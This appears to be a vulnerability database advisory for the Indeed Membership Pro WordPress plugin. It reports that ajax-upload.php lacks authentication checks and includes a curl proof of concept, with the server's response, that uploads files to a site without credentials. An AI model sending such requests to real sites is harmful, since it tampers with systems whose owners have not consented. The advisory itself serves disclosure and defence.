The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you: ~$ curl -F "[email protected]" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php {"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"} Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.
curl -F "[email protected]" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
UPLOAD
James Fraser
fwaggle
No
2019-02-26 (about 3 years ago)
2019-05-27 (about 3 years ago)
2020-02-07 (about 2 years ago)